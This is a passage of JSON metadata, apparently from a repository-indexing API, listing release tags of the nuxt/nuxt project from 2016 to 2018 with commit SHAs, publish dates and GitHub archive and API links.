nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://r